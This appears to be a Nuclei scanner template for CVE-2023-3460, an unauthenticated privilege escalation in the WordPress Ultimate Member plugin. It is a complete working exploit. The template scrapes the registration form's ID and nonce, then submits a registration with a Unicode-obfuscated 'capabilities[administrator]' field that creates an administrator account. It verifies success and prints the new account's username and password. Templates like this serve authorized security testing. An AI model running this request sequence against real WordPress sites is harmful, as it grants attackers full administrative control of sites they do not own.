id: CVE-2023-3460 info: name: Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation author: DhiyaneshDk severity: critical description: | The plugin does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild. reference: - https://github.com/gbrsh/CVE-2023-3460 - https://nvd.nist.gov/vuln/detail/CVE-2023-3460 - https://wpscan.com/vulnerability/694235c7-4469-4ffd-a722-9225b19e98d7 - https://blog.wpscan.com/hacking-campaign-actively-exploiting-ultimate-member-plugin/ - https://wordpress.org/plugins/ultimate-member/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-3460 cwe-id: CWE-269 epss-score: 0.00268 cpe: cpe:2.3:a:ultimatemember:ultimate_member:*:*:*:*:*:wordpress:*:* metadata: max-request: 4 verified: true google-query: inurl:/wp-content/plugins/ultimate-member publicwww-query: /wp-content/plugins/ultimate-member vendor: ultimatemember product: ultimate_member framework: wordpress tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,kev,wpscan variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" email: "{{randstr}}@{{rand_base(5)}}.com" firstname: "{{rand_base(5)}}" lastname: "{{rand_base(5)}}" http: - raw: - | GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1 Host: {{Hostname}} - | GET /index.php/register/?{{version}} HTTP/1.1 Host: {{Hostname}} - | GET {{path}} HTTP/1.1 Host: {{Hostname}} - | POST {{path}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded user_login-{{formid}}={{username}}&user_email-{{formid}}={{email}}&user_password-{{formid}}={{password}}&confirm_user_password-{{formid}}={{password}}&first_name-{{formid}}={{firstname}}&last_name-{{formid}}={{lastname}}&form_id={{formid}}&um_request=&_wpnonce={{wpnonce}}&wp_c%C3%A0pabilities%5Badministrator%5D=1 matchers: - type: dsl dsl: - contains(to_lower(body_1), "ultimate member") - regex("wordpress_logged_in_[a-z0-9]{32}", header_4) - status_code_4 == 302 condition: and extractors: - type: regex name: path part: location_2 group: 1 regex: - '([a-z:/.]+)' internal: true - type: regex name: version part: body_1 group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' internal: true - type: regex name: formid part: body_3 group: 1 regex: - 'name="form_id" id="form_id_([0-9]+)"' internal: true - type: regex name: wpnonce part: body_3 group: 1 regex: - 'name="_wpnonce" value="([0-9a-z]+)"' internal: true - type: dsl dsl: - '"WP_USERNAME: "+ username' - '"WP_PASSWORD: "+ password'